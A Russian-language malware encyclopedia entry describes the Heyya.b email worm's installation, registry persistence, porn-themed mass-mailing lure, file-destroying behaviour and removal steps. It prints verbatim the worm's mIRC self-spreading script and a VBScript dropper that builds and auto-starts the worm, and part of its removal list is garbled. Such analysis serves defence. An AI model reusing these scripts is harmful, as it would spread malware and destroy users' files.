Email-Worm.Win32.Heyya.b
Материал из Total Malware Info
Email-Worm.Win32.Heyya.b Вирус-червь. Распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Является приложением Windows (PE-EXE файл). Имеет размер 28672 байт.
Содержание |
Инсталляция
Копирует свой исполняемый файл как:
%System%\napster.exe %System%\newbillgates.exe %System%\HonNaCigana2.exe %System%\FreeSoftGSM.exe %System%\game.exe %System%\call.exe C:\update.exe C:\NewFilmMATRIX2.scr C:\InflunzaSystemCryptoLab.exe %WinDir%\PornoChat.exe
Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] “MicrosoftOE”=”%WinDir%\PornoChat.exe” “EVILPHILE”=”%System%\napster.exe”
Изменяет значение следующего ключа реестра:
[HKCR\exefile\shell\open\command] “default”=”C:\InflunzaSystemCryptoLab.exe %1”
Таким образом червь будет запускаться каждый раз, когда пользователь запускает какое-либо приложение.
Распространение по электронной почте
Поиск адресов для отправки писем производится в адресной книге Windows. Рассылка производится с использованием почтового API Windows(MAPI). Тема письма содержит строку:
Pornocity
Тело письма следующее:
Hi friend, new real pornochat + live cam.! FREE
Имя файла вложения:
PornoChat.exe
Деструктивная активность
Создает ключ реестра, в котором хранит свои настройки:
[HKLM\SOFTWARE\InfluenzaLab]
Записывает в следующие файлы:
C:\mirc\script.ini C:\mirc32\script.ini C:\Program Files\mirc\script.ini C:\Program Files\mirc32\script.ini
следующий текст:
[script]
;Warning! Warning!
;Dont delete file script.ini
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1=/dcc send $nick C:\NewFilmMATRIX2.scr
данный текст является скриптом для mIRC, который рассылает исполняемый файл червя всем присоединяющимся к каналу пользователям.
Производит поиск на жестком диске файлов с расширениями: .jpg, .arj, .rar и перезаписывает их содержимое заполняя мусором.
Произодит поиск на жестком диске файлов с расширением .vbs и перезаписывает их содержимое следующим текстом:
' FLUb by Radix16[MIONS]
Dim jseljmasdfkljsdfmwer,InfluenzaA,InffluenzaA,jkakljcaldsmkiuskla
Set jseljmasdfkljsdfmwer = CreateObject("Scripting.FileSystemObject")
Set jkakljcaldsmkiuskla = jseljmasdfkljsdfmwer.GetSpecialFolder(0)
Set InfluenzaA = jseljmasdfkljsdfmwer.CreateTextFile("C:\Napster.scr", True)
InfluenzaA.WriteLine "N napster.com"
InfluenzaA.WriteLine "RCX"
InfluenzaA.WriteLine "7000"
InfluenzaA.WriteLine "W"
InfluenzaA.WriteLine "Q"
InfluenzaA.close
Set jseljmasdfkljsdfmwer = CreateObject("Scripting.FileSystemObject")
Set InffluenzaA = jseljmasdfkljsdfmwer.CreateTextFile(jkakljcaldsmkiuskla&"\winstart.bat", True)
InffluenzaA.WriteLine "@ cd \"
InffluenzaA.WriteLine "@ "&jkakljcaldsmkiuskla&"\smartdrv.exe"
InffluenzaA.WriteLine "@ debug < napster.scr"
InffluenzaA.WriteLine "@ Copy napster.com "&jkakljcaldsmkiuskla&"\napster.exe"
InffluenzaA.WriteLine "@ cls"
InffluenzaA.WriteLine "@ del "&jkakljcaldsmkiuskla&"\winstart.bat"
InffluenzaA.close
Set Regedit = CreateObject("WScript.Shell")
Regedit.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\INFLUENZA",jkakljcaldsmkiuskla&"\napster.exe"
при запуске зараженного скрипта производится инсталляция червя в систему.
Производит поиск на всем жестком диске файлов с расширением .exe и замещает их содержимое своим телом.
Закрывает окна со следующими заголовками:
AVP Monitor AVG Control Center Amon Antivirus Monitor
Изменяет значение стартовой страницы Internet Explorer:
[HKLM\Software\Microsoft\Internet Explorer\Main] Start Page=”www.volny.cz/radix16/flu/update.gif” [HKCU\Software\Microsoft\Internet Explorer\Main] Start Page=”www.volny.cz/radix16/flu/update.gif”
Создает файл:
C:\heyya.txt
Содержит следующую строку:
INFLUENZA v.101 by Radix16[MIONS]
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- При помощи <Диспетчера задач> завершить вредоносный процесс.
- Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить параметры ключа системного реестра:)
- Удалить ключ системного реестра:
- Удалить файлы:
- Удалить все зараженные червем файлы.
- Восстановить оригинальное значение стартовой страницы Microsoft Internet Explorer.
- Изменить значение ключа системного реестра:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] MicrosoftOE=”%WinDir%\PornoChat.exe” EVILPHILE=”%System%\napster.exe”
[HKLM\SOFTWARE\InfluenzaLab]
%System%\napster.exe %System%\newbillgates.exe %System%\HonNaCigana2.exe %System%\FreeSoftGSM.exe %System%\game.exe %System%\call.exe C:\update.exe C:\NewFilmMATRIX2.scr C:\InflunzaSystemCryptoLab.exe %WinDir%\PornoChat.exe C:\heyya.txt
[HKCR\exefile\shell\open\command] “default”= "%1" %*".
